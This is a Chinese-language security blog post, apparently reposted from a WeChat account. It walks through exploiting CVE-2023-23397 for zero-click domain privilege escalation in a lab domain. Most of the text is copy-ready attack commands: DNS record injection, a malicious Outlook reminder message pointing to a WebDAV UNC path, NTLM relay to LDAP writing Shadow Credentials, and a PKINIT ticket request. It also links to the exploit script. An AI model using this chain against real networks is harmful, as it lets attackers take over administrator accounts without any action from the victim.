即使在微软更新补丁之后,也可以在域中实现零点击帐户接管,无需在受害者端打开消息,无需使用任务或日历事件。
执行以下命令使用dnstool.py在dns中注册攻击者机器。
python3 ./krbrelayx/dnstool.py -u 'heresec.localy-heresec' -p 'qq123123' --record fakeIT --action add --data 192.168.239.129 192.168.239.164
开启http→ldap中继后,构建并发送恶意消息,使用WEBDAV UNC路径作为指向我们ntlm中继的声音文件,无需使用任务或日历事件,只需单纯的outlook邮件消息。
python3 ./Desktop/PidLidReminderPwn.py -u y-heresec@heresec.local -p qq123123 -s exchange.heresec.local -t administrator@heresec.local -f '\[email protected]'
当使用@符号指定端口时,无论端口如何,都不会通过 SMB 协议进行连接,而是通过HTTP尝试连接WebDAV。
受害者(高权限)收到邮件,无需打开邮件,提醒会打开,outlook尝试打开声音文件,实际上指向WebDAV UNC路径,NTLM中继在此监听,通过利用msDS-KeyCredentialLink 属性执行 Shadow Credentials。
impacket-ntlmrelayx -t ldap://192.168.239.164 --no-da --no-dump --no-acl --no-validate-privs --no-smb-server --http-port 8888 --shadow-credentials
申请TGT票据。
python3 PKINITtools/gettgtpkinit.py -cert-pfx E6EaY54o.pfx -pfx-pass A72b3DYf5g1gLjh8OyKu heresec.local/ADMINISTRATOR E6EaY54o.ccache
添加环境变量后使用票据完成提权。
利用脚本在此:
https://gist.github.com/tothi/d2d6c6a3e8b1d72ce6646d8683326e49原文始发于微信公众号(关注安全技术):CVE-2023-23397 域内零点击提权
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论